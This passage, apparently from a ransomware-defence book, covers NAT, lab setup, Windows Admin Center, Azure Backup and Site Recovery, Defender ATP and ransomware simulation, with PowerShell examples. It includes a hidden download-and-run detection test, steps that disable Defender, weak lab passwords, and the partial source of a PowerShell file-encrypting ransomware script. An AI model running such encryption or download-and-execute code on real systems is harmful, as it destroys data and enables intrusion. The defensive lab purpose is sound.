5. If you can connect, your NAT rules are working through both the Azure NSG and the RRAS configuration on the nested host in Azure.

6. Next, test port 80 from the internet via GDMCALABHV1-PublicIP3; it should show the default IIS website. This also validates that the port forwarding is working.

7. Last, you can validate the NAT session mappings on the Azure nested host in the Routing and Remote Access console (IPv4, NAT, right-click the interface and select Show Mappings).
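The manual tests above can be run from any machine on the internet with the following added example (not code from the book). It probes each forwarded port and, when the TCP connection succeeds, goes one step further to confirm the session really terminates at the guest: an HTTP request on 80 and a TLS handshake on 443 that accepts the lab's self-signed certificate. The public IP is a placeholder for GDMCALABHV1-PublicIP3.

```powershell
# Added example (not from the book): layer-by-layer check of the lab's port forwarding.
function Test-LabPortForwarding {
    param(
        [Parameter(Mandatory)][string]$PublicIp,
        [int[]]$Ports = @(443, 80, 3389)
    )
    foreach ($port in $Ports) {
        $tcp = Test-NetConnection -ComputerName $PublicIp -Port $port -WarningAction SilentlyContinue
        $result = [ordered]@{ Port = $port; TcpOpen = $tcp.TcpTestSucceeded; Detail = ''; Verdict = '' }

        if (-not $tcp.TcpTestSucceeded) {
            # Nothing answered: the NSG dropped it, or RRAS has no mapping for this address/port.
            $result.Verdict = 'blocked: check the NSG inbound rule, then RRAS Services and Ports'
        }
        elseif ($port -eq 80) {
            try {
                $resp = Invoke-WebRequest -Uri "http://$PublicIp/" -UseBasicParsing -TimeoutSec 10
                $result.Detail  = "HTTP $($resp.StatusCode) $($resp.Headers['Server'])"
                $result.Verdict = 'forwarded to guest'
            } catch { $result.Verdict = "TCP open but HTTP failed: $($_.Exception.Message)" }
        }
        elseif ($port -eq 443) {
            # Handshake only; the validation callback accepts the self-signed lab cert
            # so we can read which certificate the far end presented.
            $client = New-Object System.Net.Sockets.TcpClient($PublicIp, 443)
            $ssl = New-Object System.Net.Security.SslStream($client.GetStream(), $false, { $true })
            try {
                $ssl.AuthenticateAsClient($PublicIp)
                $result.Detail  = "TLS ok, cert subject: $($ssl.RemoteCertificate.Subject)"
                $result.Verdict = 'forwarded to guest'
            } catch { $result.Verdict = "TCP open but TLS failed: $($_.Exception.Message)" }
            finally { $ssl.Dispose(); $client.Dispose() }
        }
        else {
            $result.Verdict = 'TCP open (RDP); test the logon interactively'
        }
        [pscustomobject]$result
    }
}

Test-LabPortForwarding -PublicIp '203.0.113.25' | Format-Table -AutoSize
```

A row with TcpOpen = True but a failed HTTP or TLS step points at the guest (IIS not installed, binding missing), not at the NSG or RRAS, which is the distinction the manual RDP test alone cannot make.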

Using PowerShell to Automate RRAS NAT Rule Configuration

Configuring NAT rules in Routing and Remote Access by hand can be very time consuming and tedious. In the steps below we show you how to bulk-configure rules using PowerShell.

First, review the following code:

$HostInterfaceName = "Ethernet 4"     # the RRAS public interface (Ethernet 2 in the wizard steps above)
$Protocol  = "TCP"
$PublicIP  = "10.10.1.101"
$PrivateIP = "192.168.100.101"

# One port mapping per port in the range; the private port mirrors the public one
for ($Port = 1000; $Port -le 1010; $Port++)
{
    netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port
}

This creates a custom service (NAT rule) in Routing and Remote Access on interface Ethernet 4 for TCP ports 1000 to 1010, each forwarded to the same port on 192.168.100.101.

Let's run the script and see what happens.

You can also run netsh routing dump to review the resulting configuration.

Overall, this is an easy way to automate the creation of the NAT rules for your lab.
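The loop above covers a contiguous port range on one address. The added example below (not code from the book) turns the chapter's three rules from "Configure NAT Rules in RRAS for the Lab" into a table, makes the script safe to re-run by deleting a mapping before re-adding it, and lists what RRAS holds afterwards. It uses the same netsh routing ip nat context as the chapter's loop, and assumes that context is present on the host as the chapter describes; the interface name is the RRAS public interface from the wizard.

```powershell
# Added example (not from the book): declarative RRAS port mappings for the lab.
$Interface = 'Ethernet 2'   # RRAS public interface name from the wizard
$Mappings  = @(
    [pscustomobject]@{ Proto = 'TCP'; Public = '10.10.1.10'; Port = 443;  Private = '192.168.100.99' }
    [pscustomobject]@{ Proto = 'TCP'; Public = '10.10.1.10'; Port = 80;   Private = '192.168.100.99' }
    [pscustomobject]@{ Proto = 'TCP'; Public = '10.10.1.10'; Port = 3389; Private = '192.168.100.99' }
)

function Set-RrasPortMapping {
    param(
        [Parameter(Mandatory)][string]$Interface,
        [Parameter(Mandatory)][pscustomobject[]]$Mapping
    )
    foreach ($m in $Mapping) {
        $proto = $m.Proto; $pub = $m.Public; $port = $m.Port; $priv = $m.Private

        # Re-adding an existing mapping fails, so delete first. A delete of a
        # mapping that does not exist is expected on a first run and ignored.
        netsh routing ip nat delete portmapping name="$Interface" proto=$proto publicip=$pub publicport=$port 2>$null | Out-Null

        $out = netsh routing ip nat add portmapping name="$Interface" proto=$proto publicip=$pub publicport=$port privateip=$priv privateport=$port
        if ($LASTEXITCODE -ne 0) {
            Write-Warning "Failed to map ${pub}:$port -> ${priv}:$port : $out"
        }
        elseif ($port -eq 3389) {
            Write-Warning "RDP on $pub is now reachable through RRAS; scope the matching NSG rule to your own IP."
        }
    }

    # The re-runnable dump is the easiest place to read back the mappings RRAS now holds.
    netsh routing dump | Select-String -Pattern 'portmapping'
}

Set-RrasPortMapping -Interface $Interface -Mapping $Mappings
```

Keeping the mapping table in source control, next to the NSG rule list, gives you one place to answer "what is exposed from this host" when you review the lab later.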


Chapter 3

Using BigDemo to Build your Lab

Lab Server Names

The following table describes the virtual machines required to build this lab. The lab is designed to be built on a Hyper-V host server with a minimum of 16 GB of RAM. An automation script called BigDemo_ASR_WAC.ps1 is used to provision this lab environment. You can download a copy from here: https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/blob/master/BigDemo_ASR_WAC.ps1

Hostname | Role | Operating System
DC01 | Primary Domain Controller running Active Directory Certificate Services as an Enterprise Root | Windows Server 2019
DC02 | Secondary Domain Controller running Active Directory | Windows Server 2019
S2D2019-1 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-2 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-3 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-4 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-5 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-6 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-7 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019-8 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019DR-1 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019DR-2 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019DR-3 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
S2D2019DR-4 | Storage Spaces Direct - Hyper-V Cluster Node | Windows Server 2019 LTSC
DRTitan01 | Standalone - Hyper-V Cluster Node | Windows Server 2019 LTSC
Router01 | Windows NAT router for the lab | Windows Server 2019
DHCP01 | DHCP server for the lab | Windows Server 2019
Management01 | Management server | Windows Server 2019
AZHVHost | DS8 virtual machine in Azure running nested virtualization and Hyper-V. This is the host that we run the lab on. It could also be a laptop or a physical server in your environment. | Windows Server 2019

Building the Lab with BigDemo_ASR_WAC.PS1

For this book, we wanted to help you build a lab that you could easily follow along with. If you have read some of our other books, you will have seen a script we use called BigDemo. BigDemo is a PowerShell script that builds a lab environment including AD, DHCP, management servers, clients, application servers, and others. It is highly customizable, and we have created a special edition just for this book. Follow the instructions below to download the script from our GitHub repository and start building your very own lab to follow along with.

1. Log on to the AZHVHost machine in Azure as Administrator.

2. Open an administrative PowerShell prompt and type:

   Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/master/BigDemo_ASR_WAC.ps1" -OutFile "C:\Post-Install\BigDemo_ASR_WAC.PS1"

3. Next, download a copy of Windows Server 2016 RTM from the Microsoft Eval Center (https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016/). For our lab we have a drive F:\ on the Hyper-V host; save the ISO to F:\DCBuild_Insider.

4. Next, download a copy of Windows Server Insider build 17079 (https://blogs.windows.com/windowsexperience/2018/01/23/announcing-windows-server-insider-preview-build-17079/). Save the ISO to F:\DCBuild_Insider.

5. Copy the script downloaded in step 2 (the remaining steps refer to it as BigDemo_Insider.PS1) from C:\Post-Install to F:\DCBuild_Insider.

6. Open BigDemo_Insider.PS1 in the PowerShell ISE and edit lines 425 and 434, putting in the product key you received with the evaluation version of Windows Server 2016 downloaded above.

7. Edit line 422 ($ServerISO) with the actual path and name of your server ISO, which should have been downloaded to something like F:\DCBuild_Insider. Save BigDemo_Insider.PS1.

8. Open an administrative PowerShell prompt and run BigDemo_Insider.PS1. For this book we used the following parameters:

   WorkingDir: F:\DCBuild_Insider
   Organization: MVPDays Rockstars
   Owner: Dave Kawula
   TimeZone: Mountain Standard Time
   AdminPassword: P@ssw0rd
   DomainName: MVPDays.com
   DomainAdminPassword: P@ssw0rd
   VirtualSwitchName: MVPDays_VMM_VSwitch
   Subnet: 172.16.100.
   ExtraLabFiles: C:\

9. It will take approximately 1 hour to build the lab environment.

With BigDemo you can create a new lab environment on demand. The script builds out Active Directory, DHCP, DNS, and the other core infrastructure components required to get started with your lab.
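The download and run in steps 2 and 8 can be wrapped so that you always know which script you executed with full administrative rights on the host. This is an added example, not part of the book or the BigDemo repository: it records the SHA-256 of the downloaded script, refuses to run if a previously pinned hash no longer matches, and passes the chapter's parameters from one hashtable. The parameter names are assumed to match the labels the chapter lists, the pinned hash is a placeholder you fill in after reading the script once, and the product key and ISO edits from steps 6 and 7 still apply. The P@ssw0rd value from the chapter is replaced with a generated password, since a well-known lab password is the first thing anyone who finds the lab will try.

```powershell
# Added example (not from the book): checked download and parameterised run of BigDemo.
$Uri         = 'https://raw.githubusercontent.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery/master/BigDemo_ASR_WAC.ps1'
$Dir         = 'F:\DCBuild_Insider'
$Path        = Join-Path $Dir 'BigDemo_ASR_WAC.ps1'
$KnownSha256 = ''   # placeholder: paste the hash printed on your first run after you have read the script

New-Item -ItemType Directory -Path $Dir -Force | Out-Null
Invoke-WebRequest -Uri $Uri -OutFile $Path -UseBasicParsing

# Supply-chain check. A script pulled from a raw GitHub URL runs as Administrator
# on the host, so review it once and pin its hash; a changed hash means re-review.
$hash = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
"SHA256 $hash  $Path"
if ($KnownSha256 -and $hash -ne $KnownSha256) {
    throw 'BigDemo hash changed since the last review; inspect the diff before running it.'
}
$sig = Get-AuthenticodeSignature -FilePath $Path
"Authenticode status: $($sig.Status)"   # NotSigned is expected here; the hash pin is then your only control

# Lab-only credentials: generate instead of using P@ssw0rd, and record the value.
$chars = [char[]]'abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'
$labPassword = (-join ($chars | Get-Random -Count 18)) + '!Aa1'   # suffix guarantees AD complexity
"Lab administrator password (store it in your password manager now): $labPassword"

# Parameter names assumed from the chapter's list.
$params = @{
    WorkingDir          = $Dir
    Organization        = 'MVPDays Rockstars'
    Owner               = 'Dave Kawula'
    TimeZone            = 'Mountain Standard Time'
    AdminPassword       = $labPassword
    DomainName          = 'MVPDays.com'
    DomainAdminPassword = $labPassword
    VirtualSwitchName   = 'MVPDays_VMM_VSwitch'
    Subnet              = '172.16.100.'
    ExtraLabFiles       = 'C:\'
}
& $Path @params
```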

Chapter 4

Configuring Windows Admin Center

In this chapter, we will look at setting up Windows Admin Center in the lab. We have already installed Windows Admin Center and will start with the basic configuration. For your reference, we used the following PowerShell function during provisioning to download and install Windows Admin Center on the Management virtual machine.

Function Install-WindowsAdminCenter {
    param
    (
        [string]$VMName,
        [string]$GuestOSName,
        [string]$VMPath,
        [string]$WorkingDir,
        [pscredential]$DomainCred = $domainCred   # domain credential supplied by the calling BigDemo script
    )

    # Everything runs inside the guest over PowerShell Direct (-VMName), so the
    # download happens from the guest, not from the Hyper-V host.
    Invoke-Command -VMName $VMName -Credential $DomainCred {

        # Download Windows Admin Center to c:\Post-Install
        New-Item -ItemType Directory -Path "c:\Post-Install" -Force:$true | Out-Null
        Write-Output "Downloading Windows Admin Center"
        # Ping the internet to confirm the lab has outbound connectivity before downloading
        ping www.google.com

        Invoke-WebRequest -UseBasicParsing -Uri https://aka.ms/WACDownload -OutFile "c:\Post-Install\WindowsAdminCenter.msi"

        Write-Output "Installing Windows Admin Center"
        # SME_PORT is the gateway port. SSL_CERTIFICATE_OPTION=generate creates a
        # self-signed certificate that expires after 60 days, which is why the
        # browser warns on every connection later in this chapter.
        Start-Process msiexec.exe -Wait -ArgumentList "/i c:\post-install\WindowsAdminCenter.msi /qn /L*v c:\post-install\WindowsAdminCenter-install.log SME_PORT=6516 SSL_CERTIFICATE_OPTION=generate"
    }
}
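The generated self-signed certificate is the reason every later section has a "click Advanced and accept the security warnings" step, and it expires after 60 days. Since DC01 in this lab runs Active Directory Certificate Services as an enterprise root, the gateway can be bound to a CA-issued certificate instead. The following is an added example, not code from the book: run on Management01 as Administrator, it requests a certificate from the enterprise CA and installs Windows Admin Center with the installer's SSL_CERTIFICATE_OPTION=installed and SME_THUMBPRINT properties. It assumes the CA publishes the built-in WebServer template with enrol rights for the Management01 computer account and that the MSI is already in C:\Post-Install.

```powershell
# Added example (not from the book): install Windows Admin Center with a CA-issued certificate.
$Port     = 6516
$Msi      = 'C:\Post-Install\WindowsAdminCenter.msi'
$DnsName  = "$env:COMPUTERNAME.$env:USERDNSDOMAIN".ToLower()   # e.g. management01.mvpdays.com
$Template = 'WebServer'   # assumption: published on DC01's CA with autoenrol/enrol rights

# 1. Reuse a valid server-auth certificate if one exists, otherwise enrol for one.
$cert = Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.Subject -eq "CN=$DnsName" -and $_.HasPrivateKey -and $_.NotAfter -gt (Get-Date).AddDays(30) } |
    Sort-Object NotAfter -Descending | Select-Object -First 1
if (-not $cert) {
    $req = Get-Certificate -Template $Template -DnsName $DnsName -SubjectName "CN=$DnsName" -CertStoreLocation Cert:\LocalMachine\My
    if ($req.Status -ne 'Issued') { throw "Certificate request did not complete: status $($req.Status)" }
    $cert = $req.Certificate
}

# 2. Install the gateway bound to that certificate. SME_THUMBPRINT must name a
#    certificate in LocalMachine\My that has a private key.
$msiArgs = "/i `"$Msi`" /qn /L*v C:\Post-Install\WAC-install.log SME_PORT=$Port SSL_CERTIFICATE_OPTION=installed SME_THUMBPRINT=$($cert.Thumbprint)"
$proc = Start-Process msiexec.exe -Wait -PassThru -ArgumentList $msiArgs
if ($proc.ExitCode -notin @(0, 3010)) { throw "msiexec exited with $($proc.ExitCode); see C:\Post-Install\WAC-install.log" }

# 3. Check the HTTP.sys binding the installer created really uses the CA-issued cert.
$line  = netsh http show sslcert ipport=0.0.0.0:$Port | Select-String 'Certificate Hash' | Select-Object -First 1
$bound = if ($line) { ($line.ToString() -split ':')[-1].Trim() } else { '' }
if ($bound -ne $cert.Thumbprint) { throw "Gateway binding shows '$bound', expected $($cert.Thumbprint)" }
"Windows Admin Center is serving https://${DnsName}:$Port with a certificate issued by $($cert.Issuer)"
```

Browse to the fully qualified name rather than https://localhost:6516 afterwards; the certificate is issued for the FQDN, so only that URL validates cleanly from domain-joined machines that trust the lab root CA.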

Install Google Chrome and Mozilla Firefox

You are probably wondering why we would install Google Chrome and Mozilla Firefox in the lab. The answer is very simple: Microsoft Edge does not ship with the server operating systems and Internet Explorer is not a supported browser for Windows Admin Center, so we cannot configure Windows Admin Center without an alternate browser. Once we have things initially configured, we could easily use Edge from another Windows 10 desktop.

1. Log on to Management01 as Administrator.

2. Download and install Google Chrome and Mozilla Firefox.

Configure Windows Admin Center

In the following steps, we will configure Windows Admin Center with the base configuration.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516.
3. Click Advanced and accept the security warnings to continue (the installer generated a self-signed certificate, so the browser cannot validate it).
4. Log on with Domain Admin credentials.
5. Click on Skip Tour.
6. Click on Management01.
7. Verify that Windows Admin Center connects and is working.

Configure Azure Integration

In these steps, we will configure Microsoft Azure integration with Windows Admin Center. These steps are required to configure hybrid services such as Azure Backup and Azure Site Recovery.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516.
3. Click Advanced and accept the security warnings to continue.
4. Log on with Domain Admin credentials.
5. Click on the Settings wheel in the top right corner of Windows Admin Center.
6. Verify that Windows Admin Center connects and is working.
7. Click on the Azure option in the menu, then click Register.
8. On the Register the gateway with Azure page, click Copy Code and then click Device Logon.
9. On the Device Logon screen, paste the code and click Continue.
10. Sign in with your Azure tenant credentials.
11. Close the Microsoft Azure PowerShell window when prompted.
12. Select your tenant ID and click Register. If you don't know your tenant ID, you can click on Azure Active Directory in the Azure portal and then click Properties.
13. Verify that you see the message "successfully registered with Azure Active Directory".
14. Click on Go to Azure AD app registration.
15. On the Azure app Settings page, click Settings and then click Required permissions.
16. Click Grant permissions and click Yes. This is admin consent for the gateway's app registration, so review the listed permissions before granting them; they are what the gateway can do in your tenant.
17. Once completed, click the Close button in Windows Admin Center.

Configure Azure Backup

In these steps, we will test Azure hybrid integration by setting up Azure Backup on the management server.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516.
3. Click Advanced and accept the security warnings to continue.
4. Log on with Domain Admin credentials.
5. Click on Management01.
6. Click on Backup and click on Set up Azure Backup.
7. On the Azure Backup tab, click on Login and log in.
8. On the Set up Azure Backup page, click Step 2, Show details, and change the region to your local region.
9. On Step 3, select C:\ and System State.
10. Still on Step 3, confirm the backup schedule.
11. On Step 4, enter an encryption passphrase. The passphrase is required to restore, so keep it somewhere the server cannot reach (a password manager or an offline record); a ransomware attack that encrypts the server would take a locally stored passphrase with it.
12. Click Apply.
13. Wait while your recovery vault is created.

Note: Windows Admin Center creates a new Recovery Services vault for each machine that is protected. It is configured this way to avoid throttling of the accounts.

14. Wait until the Azure Backup setup is complete before changing tabs.
15. Once complete, verify the settings. Note: this is a great way to test Windows Admin Center integration.
16. Test the backup to the recovery vault by clicking Backup Now.
17. Choose Files and Folders and click Backup.
18. You will notice that a job has kicked off for the backup.
19. You will notice that the backup job is in progress.

Verifying Backups Locally with the Microsoft Azure Backup Agent

We can check the status of our Azure backups with the local Microsoft Azure Backup agent that was installed by Windows Admin Center.

1. Log on to Management01 as Administrator.
2. On the desktop, click on Microsoft Azure Backup.
3. Verify your backups or jobs in progress locally here.

Configuring Azure Update Management

An important part of our ransomware defense strategy is keeping up to date with Windows updates and rollups. This can be easily accomplished by integrating Windows Admin Center with Azure Update Management. In the following steps, we will show you how to set up Azure Update Management to keep your servers up to date.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516.
3. Click Advanced and accept the security warnings to continue.
4. Log on with Domain Admin credentials.
5. Click on Management01.
6. Click on Updates and then click on Centrally manage updates on all your servers by using Azure Update Management (Set up now).
7. On the Set up Azure Update Management tab, choose your subscription.
8. Create a new resource group.
9. Choose a region.
10. Create a new Log Analytics workspace.
11. Create a new Azure Automation account and click Set up.
12. View the progress by checking the notification details.
13. Once completed, you should see a success status message.
14. Once setup is complete, click on Manage in Azure.
15. You will see your server show up in Azure Update Management.
16. Next, click on Schedule update deployment.
17. For Name, type: Daily Updates.
18. Complete the deployment settings and select Management01.
19. Once complete, you can see that the updates are managed by Azure Update Management.

Configure Azure Site Recovery

An important part of our ransomware defense strategy is having an up-to-date disaster recovery solution. In the event of a ransomware attack, the only option might be recovering to a DR site like Azure. Keep in mind that Azure Site Recovery replicates whatever is written to the disk, encrypted files included, so recovering from ransomware depends on having a recovery point from before the encryption started; check the recovery point retention in the replication policy.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516.
3. Click Advanced and accept the security warnings to continue.
4. Log on with Domain Admin credentials.
5. Click on drtitan01.
6. Click on Virtual Machines and click on Help protect your VMs from disasters by using Azure Site Recovery (Set up now).
7. On the Set up host with Azure Site Recovery page, choose your subscription.
8. Select a resource group.
9. Create a new Recovery Services vault and click Set up ASR.
10. Verify the progress.
11. On the Inventory tab, you can see the Disaster Recovery status change once it is ready.
12. Configure Azure Site Recovery protection for FS01: select FS01, click More and click Protect VM.
13. On the Protect FS01 with Azure Site Recovery window, create a new storage account called asrdrtitanstorage.
14. Click Protect VM.

Upgrade to Security Center Standard in Azure

To start seeing metrics and to use Security Center, we need to either start a trial of or sign up for Security Center Standard.

1. Open the Azure portal and browse to Security Center, Getting started. Click on asrransomwarelogs and click Upgrade.
2. Once upgraded, you will see the checkmark under Upgraded.

Chapter 5

Windows Defender Advanced Threat Protection (ATP)

Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help protect your Windows Servers. It extends the Windows Defender Antivirus that is included with Windows Server 2019 with cloud-based endpoint detection and response: alerts, a timeline of what happened on each machine, and automated investigation of incidents.

In this chapter, we will give a brief overview of some of the features. To start things off, you will need to sign up for a trial here: https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink

Onboarding a Server with Windows Defender ATP

1. Browse to https://securitycenter.windows.com/dashboard.
2. Log in with your admin credentials.
3. Click on the Settings wheel and scroll down to Machine management.
4. You will notice that there are many different deployment options: local script, Group Policy, Configuration Manager, and so on.
5. Choose Local Script.
6. Download the deployment package to the target server, Management01. The package contains your tenant's onboarding configuration, so treat it as sensitive and do not leave it on shared storage.
7. Open an administrative command prompt and run WindowsDefenderATPLocalOnboardingScript.cmd.
8. Wait approximately 5 minutes and check the Machines list in the portal.
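Rather than waiting and refreshing the Machines list, the onboarding result can be checked on the server itself, and a harmless test alert raised so that the machine shows an alert in the portal. The following is an added example, not code from the book or from the onboarding package. The registry values and the Sense service are what the onboarding script configures, and the detection test is the one Microsoft documents for verifying onboarding; the temporary folder is the one that documented test uses.

```powershell
# Added example (not from the book): verify Defender ATP onboarding and raise a test alert.
function Get-AtpOnboardingState {
    $status = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status' -ErrorAction SilentlyContinue
    $sense  = Get-Service -Name Sense -ErrorAction SilentlyContinue
    [pscustomobject]@{
        OnboardingState = $status.OnboardingState                              # 1 = onboarded
        OrgId           = $status.OrgId                                        # your tenant's org id
        SenseService    = if ($sense) { $sense.Status } else { 'not installed' }
        Onboarded       = [bool]($status.OnboardingState -eq 1 -and $sense -and $sense.Status -eq 'Running')
    }
}

$state = Get-AtpOnboardingState
$state
if (-not $state.Onboarded) {
    throw 'Not onboarded: re-run WindowsDefenderATPLocalOnboardingScript.cmd as Administrator and wait a few minutes.'
}

# Documented detection test. Nothing is really downloaded: the URL is deliberately
# unreachable and it is the attempt pattern the Sense agent reports. Run it from an
# elevated prompt; the alert appears for this machine within a few minutes.
$testDir = 'C:\test-WDATP-test'
New-Item -ItemType Directory -Path $testDir -Force | Out-Null
$cmd = "`$ErrorActionPreference='silentlycontinue';" +
       "(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','$testDir\invoice.exe');" +
       "Start-Process '$testDir\invoice.exe'"
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden -Command $cmd
"Detection test launched on $env:COMPUTERNAME; check the portal for a new alert."
```

If OnboardingState is 1 but the Sense service is stopped, the machine will appear in the portal and then go stale; start the service and check the Microsoft-Windows-SENSE/Operational event log for the reason it stopped.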

Reviewing an Incident with Windows Defender Advanced Threat Protection

1. Browse to https://securitycenter.windows.com/dashboard.
2. Log in with your admin credentials.
3. Here we can see that our machine Management01 has had Occamy malware detected. We will look at this attack later in the book.
4. If we scroll down on the machine page, we can see a timeline of the infection.
5. We can also drill into the alert, which gives more information about the incident.
6. We can also see an incident graph.
7. We can also drill into the investigation that took place for this incident.

Chapter 6

Simulating a Ransomware Attack

KnowBe4 Ransomware Simulator on Windows Server 2019

RanSim simulates 13 ransomware infection scenarios and 1 crypto-mining infection scenario and shows you whether a workstation is vulnerable to them.

1. In order to initially test the ransomware simulator we are going to have to turn off Windows Defender protection on our Windows Server 2019 machine Management01. If you don't do this, the installation of the ransomware simulator will fail.
2. Download the KnowBe4 Ransomware Simulator from https://www.knowbe4.com/ransomware-simulator.
3. Run SimulatorSetup.exe and click Install.
4. Once setup has completed, close the installation window.
5. The files for the installation are located in C:\Users\Administrator.MMSMOA\AppData\Local\RnSimulator. This is also where the temporary files used during the ransomware tests are stored.
6. On the KnowBe4 Ransomware Simulator window, click Launch.
7. On the KnowBe4 RanSim window, click Launch.
8. We will launch the attack initially with Defender disabled and see what happens.
9. You will see a test folder get created; you don't see this when Windows Defender is enabled.
10. You will be able to see the files being encrypted in real time in that folder.
11. We can see that 14/14 scenarios succeeded with Windows Defender off.
12. Now let us turn Windows Defender protection back on.
13. Re-run the tests, this time with protection enabled.
14. You can see right away that Windows Defender found a problem.
15. We can see that Trojan:Win32/Occamy.C was found.
16. One of the things that I noticed when Defender was enabled was that the ransomware tool was very slow and unresponsive.
17. And we can see that after a long period of time none of these attacks succeeded directly on the server.

Enabling Ransomware Protection on Windows Server 2019

A new feature in Windows Server 2019 is Ransomware Protection (Controlled Folder Access). In the following steps, we will re-run the RanSim tests with it enabled and look at the output.

1. Open Windows Security and click on Ransomware protection.
2. Click on Manage ransomware protection.
3. Turn on Controlled folder access.
4. Click on Protected folders to see which folders are protected by default.
5. Click on Add a protected folder and add C:\Users\Administrator.MMSMOA\AppData\Local\RnSimulator.
6. Re-run the RanSim tests.
7. Right away a new popup shows Unauthorized changes blocked: Controlled folder access blocked collector.exe from making changes.
8. Moreover, we can see that after a long period none of these attacks succeeded directly on the server.
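The same configuration can be applied and, more usefully, read back with the Defender PowerShell module, which also lets you pull the block events the popup in step 7 is based on. This is an added example, not code from the book; the RanSim path is the chapter's, and the Windows Defender operational log event IDs used are 1123 for a Controlled Folder Access block and 1124 for an audit-mode hit.

```powershell
# Added example (not from the book): Controlled Folder Access by PowerShell, with block-event readout.
$RanSimFolder = 'C:\Users\Administrator.MMSMOA\AppData\Local\RnSimulator'   # chapter's test folder

# 1. Enable CFA in block mode and protect the RanSim folder. On a production
#    server start with AuditMode instead: it logs (event 1124) without blocking,
#    which shows you which legitimate applications need allow-listing first.
Set-MpPreference -EnableControlledFolderAccess Enabled
Add-MpPreference -ControlledFolderAccessProtectedFolders $RanSimFolder

# 2. Read back what Defender is actually enforcing (1 = Enabled, 2 = AuditMode).
$pref = Get-MpPreference
[pscustomobject]@{
    CfaState         = $pref.EnableControlledFolderAccess
    ProtectedFolders = $pref.ControlledFolderAccessProtectedFolders -join '; '
    AllowedApps      = $pref.ControlledFolderAccessAllowedApplications -join '; '
} | Format-List

# 3. After re-running RanSim: list the write attempts CFA blocked or audited.
function Get-CfaBlockEvent {
    param([datetime]$Since = (Get-Date).AddHours(-1))
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Mode   = if ($_.Id -eq 1123) { 'Blocked' } else { 'Audited' }
            Detail = ($_.Message -split "`r?`n")[0]   # names the process (e.g. collector.exe) and the target path
        }
    }
}
Get-CfaBlockEvent | Format-Table -AutoSize -Wrap
```

Forwarding event 1123 to your SIEM is the detection you actually want from this feature: a burst of blocks from one process against many files is the ransomware pattern RanSim is reproducing.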

Executing a Ransomware Attack with PowerShell

The code below is only to be used for testing purposes. DO NOT run this in a production environment. None of the authors of this book take any responsibility for your actions.

Windows Defender does not pick this attack up: it is an administrative PowerShell script that uses only the built-in .NET cryptography classes, so there is no malware signature for it to match. Running it with administrative credentials means every file in the selected folder is writable, and at that point you are the victim of a ransomware attack. Unlike real ransomware, the private key that can undo the damage stays in this machine's certificate store (LocalMachine\My), which is what makes it safe to run in the lab.

Add-Type -AssemblyName System.Windows.Forms

# Let the operator pick the folder to encrypt
$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath

# Define the cert to use for encryption. Its RSA public key wraps a fresh AES key
# per file; the private key stays in LocalMachine\My on this machine.
# Create your own cert with this command and keep the object it returns:
$Cert = New-SelfSignedCertificate -CertStoreLocation Cert:\LocalMachine\My -DnsName ransomware.mmsmoa.local
# (or select an existing one by thumbprint, for example
#  $Cert = Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A)
$Cert

# Discover the files beneath the selected path (folders are skipped)
$FilesToEncrypt = Get-ChildItem -Recurse -Force -File -Path $FolderBrowser.SelectedPath -ErrorAction SilentlyContinue |
    ForEach-Object { $_.FullName }
$FilesToEncrypt

Function Encrypt-File
{
    Param([Parameter(Mandatory=$true)][System.IO.FileInfo]$FileToEncrypt,
          [Parameter(Mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    # AES-256-CBC for the file body; a random key and IV are generated per file
    $AesProvider = New-Object System.Security.Cryptography.AesManaged
    $AesProvider.KeySize = 256
    $AesProvider.BlockSize = 128
    $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC

    # Wrap the AES key with the certificate's RSA public key (PKCS#1 v1.5)
    $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
